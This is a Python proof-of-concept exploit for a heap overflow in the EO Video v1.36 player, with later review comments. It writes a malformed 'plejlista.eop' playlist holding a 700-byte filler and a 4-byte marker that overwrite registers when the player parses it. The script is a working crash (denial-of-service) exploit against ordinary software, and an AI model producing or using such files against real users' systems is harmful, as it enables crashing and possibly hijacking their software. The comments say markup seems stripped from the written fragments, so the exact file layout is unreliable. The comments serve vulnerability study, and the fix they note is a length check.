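#!/usr/bin/python
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in buffer overflow
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# --------------------------------------------------------------
#
# What this script does: writes a malformed playlist file named
# 'plejlista.eop' into the current working directory, overwriting any
# existing file of that name. It does nothing else.
#
# The register values in the header are the author's; 0x42424242 matches
# the four '\x42' bytes appended after the 700-byte filler below
# (presumably recorded in a debugger at crash time).
#
# NOTE(review): per the header this is a heap overflow triggered while the
# player parses an over-long field in a .eop playlist; the parser-side fix
# for this defect class is a length check before the field is copied.
#
# NOTE(review): the literal fragments written below look as if markup was
# stripped when the page was extracted (the empty strings around `bafer`
# suggest missing tags) -- confirm against the original advisory before
# relying on the exact file layout. They are reproduced here as published.

import os

# 700 filler bytes ('A') followed by a 4-byte marker ('B' * 4).
bafer = '\x41' * 700 + '\x42' * 4

# Parenthesised form prints the same text on Python 2 and Python 3.
print("Spit me out, all bright and shiny! :)")

# Context manager closes the handle even if one of the writes raises.
with open('plejlista.eop', 'w') as fileHandle:
    fileHandle.write('\n\n\n\nnesto\n1\n ')
    fileHandle.write('\n\nnesto\n1\n\n\n\n ')
    # The over-long field value.
    fileHandle.write('' + bafer + '')
    fileHandle.write('0\n0\n\n-1\n-1\n\n ')
    fileHandle.write('30216\n0\n ')
    fileHandle.write('\n\n\n')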